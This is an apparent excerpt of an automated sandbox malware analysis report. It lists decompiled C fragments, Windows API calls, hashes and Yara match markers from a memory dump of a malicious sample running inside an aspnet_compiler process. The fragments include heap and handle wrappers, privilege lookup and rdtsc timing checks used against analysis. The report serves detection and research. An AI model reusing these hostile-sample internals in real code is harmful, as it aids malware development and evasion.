                                                  			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                  0x00418713
                                                  0x00418716
                                                  0x0041871f
                                                  0x00418727
                                                  0x00418735
                                                  0x00418739

                                                  APIs
                                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ccc30d144d5d55738f25c7cc088990c62f2e2b868f9e7a46b877e51e1fff8f36
                                                  • Instruction ID: e39533a99db9d63167b022e13dcb2774e7d5ff62617ddc86e859ae98e6cd4a90
                                                  • Opcode Fuzzy Hash: ccc30d144d5d55738f25c7cc088990c62f2e2b868f9e7a46b877e51e1fff8f36
                                                  • Instruction Fuzzy Hash: 519002A138110442D10061994414B060105E7E1341F51C115E2058668DC659CD567166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8082d2c4ab4a1dada748a6194c412021cdaea5fccfca899f8a43e2f6731a8bb9
                                                  • Instruction ID: 20f0f92dede06bf75e39e3807e8fef1a3a0802db9ab731840414afc5606f7277
                                                  • Opcode Fuzzy Hash: 8082d2c4ab4a1dada748a6194c412021cdaea5fccfca899f8a43e2f6731a8bb9
                                                  • Instruction Fuzzy Hash: 4B9002A124210003410571994414616410AA7E0341F51C121E20086A4DC56589957165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 46c74b248b6814dae9c7380ee03928fdecabd379686eb7e63e91662f773c1ee8
                                                  • Instruction ID: 7aaea28e9414b3fdbe30557d9824971b7a7e66122e22fef8d6ac67aadc2ab601
                                                  • Opcode Fuzzy Hash: 46c74b248b6814dae9c7380ee03928fdecabd379686eb7e63e91662f773c1ee8
                                                  • Instruction Fuzzy Hash: 2C9002B124110402D140719944047460105A7D0341F51C111A6058668EC6998ED976A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3412511626a757f52c19abc5d8eab8a307e51b57aa6742f3a7897f18c277f5de
                                                  • Instruction ID: d9a1f0cdf926bfc343d120384bcdf87ce11427146e5737e285400e14ebfaeeda
                                                  • Opcode Fuzzy Hash: 3412511626a757f52c19abc5d8eab8a307e51b57aa6742f3a7897f18c277f5de
                                                  • Instruction Fuzzy Hash: 53900265251100030105A59907045070146A7D5391751C121F2009664CD66189656161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a36f403e8cc513f0e40da3fe6f22f02ec83901493aac432ac8390e1d842307ca
                                                  • Instruction ID: 513d14677207e541cecc5af5780bf52ffa373fc9e8676dfc546b9d657edb3789
                                                  • Opcode Fuzzy Hash: a36f403e8cc513f0e40da3fe6f22f02ec83901493aac432ac8390e1d842307ca
                                                  • Instruction Fuzzy Hash: E590026164110502D10171994404616010AA7D0381F91C122A2018669ECA658A96B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ce7371902d5beb94f8c97f5d9307b5f0d20e4d4756c6cb54e059f742eabb5fad
                                                  • Instruction ID: 83a80ce12bc732e0af9cf0c083486713aa9c464d9ba419caf902105919826388
                                                  • Opcode Fuzzy Hash: ce7371902d5beb94f8c97f5d9307b5f0d20e4d4756c6cb54e059f742eabb5fad
                                                  • Instruction Fuzzy Hash: 52900261282141525545B19944045074106B7E0381B91C112A2408A64CC566995AE661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 426e3b35efbfae932e38a7d9025fd32bf1acf1d5746c97ebc4213e5cb46ccc09
                                                  • Instruction ID: 53c88c07c90e8abca23aaafc144074e1aaccec5927e21d65de6d31a732fd990f
                                                  • Opcode Fuzzy Hash: 426e3b35efbfae932e38a7d9025fd32bf1acf1d5746c97ebc4213e5cb46ccc09
                                                  • Instruction Fuzzy Hash: A390027124110413D111619945047070109A7D0381F91C512A141866CDD6968A56B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6eb70a822dfd1c672a4b5cb7dec1bf7932df3bd4c3f29bef0017c615f3637eb7
                                                  • Instruction ID: 65bac8b1b27aa949d6f92b7318e196f10ca3678414b553e3c2456301cc3adba7
                                                  • Opcode Fuzzy Hash: 6eb70a822dfd1c672a4b5cb7dec1bf7932df3bd4c3f29bef0017c615f3637eb7
                                                  • Instruction Fuzzy Hash: 8290026925310002D1807199540860A0105A7D1342F91D515A100966CCC955896D6361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0bca917eac9204a90ac173c785f1f05f704058c73caea150b69356a1c33d66c3
                                                  • Instruction ID: 0a122bc3fa0dd0935ad29522f30bb7a87bf544c9bfc4fa4e8b5e4a7de9f708b7
                                                  • Opcode Fuzzy Hash: 0bca917eac9204a90ac173c785f1f05f704058c73caea150b69356a1c33d66c3
                                                  • Instruction Fuzzy Hash: E590026134110003D140719954186064105F7E1341F51D111E1408668CD955895A6262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e689c9337dc410be0c1329ff5070308f6322dc48892752d4ed6d963c82338050
                                                  • Instruction ID: 7d8156daf270c10d7377dc0bc9a3188d03098437d4a42a2b8db437e21285ebb5
                                                  • Opcode Fuzzy Hash: e689c9337dc410be0c1329ff5070308f6322dc48892752d4ed6d963c82338050
                                                  • Instruction Fuzzy Hash: 6390027135124402D110619984047060105A7D1341F51C511A181866CDC6D589957162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 571a68377945d66f9811d3a5c04dddd6b43afbe0345ce9a6113fc0389b55e435
                                                  • Instruction ID: 332a9016fdc91ad2171395f83aca3d13dd00a3f73f90a01016481c587a41d400
                                                  • Opcode Fuzzy Hash: 571a68377945d66f9811d3a5c04dddd6b43afbe0345ce9a6113fc0389b55e435
                                                  • Instruction Fuzzy Hash: 1790027124110402D10065D954086460105A7E0341F51D111A6018669EC6A589957171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2c11ea3fc8c9496ec88451ba01eeb90f15a46cac7b9de29ef323bd58b2ecec8a
                                                  • Instruction ID: 52ab43efa3b744aeb291cedab445594ec00498d439530b2bd4404b3ea0f3933b
                                                  • Opcode Fuzzy Hash: 2c11ea3fc8c9496ec88451ba01eeb90f15a46cac7b9de29ef323bd58b2ecec8a
                                                  • Instruction Fuzzy Hash: 5E90027124118802D1106199840474A0105A7D0341F55C511A541876CDC6D589957161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8c9096c25fd71d7336fd7d406431ec8e9e5c461de6264614b31e75423e628f48
                                                  • Instruction ID: 31549e02d6c83aa64f89c08e481db3b1f193ff75214d93688f198baa2a070a75
                                                  • Opcode Fuzzy Hash: 8c9096c25fd71d7336fd7d406431ec8e9e5c461de6264614b31e75423e628f48
                                                  • Instruction Fuzzy Hash: B790027124150402D1006199481470B0105A7D0342F51C111A2158669DC665895575B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a20d728273edfa31dfa176451d5a38d342f44d4136a173ecb8fbc505e3026e0e
                                                  • Instruction ID: 01c8729533e40769b122e448515f30aaac07fff8fbf7381f245c1019d18e19f8
                                                  • Opcode Fuzzy Hash: a20d728273edfa31dfa176451d5a38d342f44d4136a173ecb8fbc505e3026e0e
                                                  • Instruction Fuzzy Hash: A190026164110042414071A988449064105BBE1351B51C221A198C664DC599896966A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 4681d0504b74e24b32c7853c1f8d7e756e048e22d9280d9d8bb2af3ee1fca3a8
                                                  • Instruction ID: 774f6b32b59786949d23d76fe807495ff421b0d77be9041ec3e13ecf1327e554
                                                  • Opcode Fuzzy Hash: 4681d0504b74e24b32c7853c1f8d7e756e048e22d9280d9d8bb2af3ee1fca3a8
                                                  • Instruction Fuzzy Hash: AA90026125190042D20065A94C14B070105A7D0343F51C215A1148668CC95589656561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f8816e56c8fc2d86aa0d68bab1976ea9ddcd9a211212ae6a1134700db688b3a
                                                  • Instruction ID: 342585db499cafd7101d826848f690bd961f1a29965435afac9574e07a349aaf
                                                  • Opcode Fuzzy Hash: 3f8816e56c8fc2d86aa0d68bab1976ea9ddcd9a211212ae6a1134700db688b3a
                                                  • Instruction Fuzzy Hash: 0D90027124110802D1807199440464A0105A7D1341F91C115A1019768DCA558B5D77E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004088D0 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0F0( &_v284, 0x104);
						E0041A760( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                  0x004088db
                                                  0x004088e3
                                                  0x004088e5
                                                  0x004088ea
                                                  0x004088ef
                                                  0x00408902
                                                  0x00408907
                                                  0x00408910
                                                  0x0040891c
                                                  0x0040892f
                                                  0x00408934
                                                  0x00408937
                                                  0x00408940
                                                  0x00408952
                                                  0x00408957
                                                  0x0040895c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040895e
                                                  0x00408962
                                                  0x00000000
                                                  0x00000000
                                                  0x00408964
                                                  0x00000000
                                                  0x00408962
                                                  0x00408966
                                                  0x00408969
                                                  0x0040896f
                                                  0x00408971
                                                  0x0040897c
                                                  0x00408981
                                                  0x00408984
                                                  0x00408991
                                                  0x0040899c
                                                  0x0040899e
                                                  0x004089a4
                                                  0x004089a8
                                                  0x004089ab
                                                  0x004089ab
                                                  0x004089b2
                                                  0x004089b5
                                                  0x004089ba
                                                  0x004089c7
                                                  0x004088f6
                                                  0x004088f6
                                                  0x004088f6

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 6 4188b0-4188dd call 4191e0 RtlAllocateHeap 9 4188df-4188e1 6->9
                                                  C-Code - Quality: 100%
                                                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                  0x004188c7
                                                  0x004188d2
                                                  0x004188dd
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: 65A
                                                  • API String ID: 1279760036-2085483392
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004189F5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 244 4189f5-4189fd 245 418981-4189b8 244->245 246 4189ff 244->246 247 418a01-418a40 call 4191e0 246->247 248 418a56-418a6a call 4191e0 246->248 253 418a6f-418a84 LookupPrivilegeValueW 248->253
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 7cc476b2bbb40829cd325352c3100e736162fe530be15950fac3e3e578fb7211
                                                  • Instruction ID: 6f3c838e53ed1bc7e48e56334e66cad6496c53fdba95f5a285346841f89e608e
                                                  • Opcode Fuzzy Hash: 7cc476b2bbb40829cd325352c3100e736162fe530be15950fac3e3e578fb7211
                                                  • Instruction Fuzzy Hash: 5F2145B2200109AFDB14DF99DC81EEB77ADAF8C350F058259FA0C97241CA34E851CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 255 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 264 4072cc-4072de PostThreadMessageW 255->264 265 4072fe-407302 255->265 266 4072e0-4072fa call 4092a0 264->266 267 4072fd 264->267 266->267 267->265
                                                  C-Code - Quality: 82%
                                                  			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                  0x00407280
                                                  0x0040728f
                                                  0x00407293
                                                  0x0040729e
                                                  0x004072ae
                                                  0x004072be
                                                  0x004072c3
                                                  0x004072ca
                                                  0x004072cd
                                                  0x004072da
                                                  0x004072dc
                                                  0x004072de
                                                  0x004072fb
                                                  0x004072fb
                                                  0x00000000
                                                  0x004072fd
                                                  0x00407302

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188EE Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 291 4188ee-418907 call 4191e0 293 41890c-418921 RtlFreeHeap 291->293
                                                  C-Code - Quality: 79%
                                                  			E004188EE(intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t10;
				void* _t16;

				_pop(_t21);
				_t7 = _a8;
				_t3 = _t7 + 0xc74; // 0xc74
				E004191E0(_t16, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t10;
			}





                                                  0x004188ee
                                                  0x004188f3
                                                  0x004188ff
                                                  0x00418907
                                                  0x0041891d
                                                  0x00418921

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c687a6a72d3fbd85b4a1ffa6d07917b003a56f86b7a4b9aea6754b9c32c2e3a8
                                                  • Instruction ID: 88093b25493982788babfb0ff763804637a79ac0a04c572e657453119da285aa
                                                  • Opcode Fuzzy Hash: c687a6a72d3fbd85b4a1ffa6d07917b003a56f86b7a4b9aea6754b9c32c2e3a8
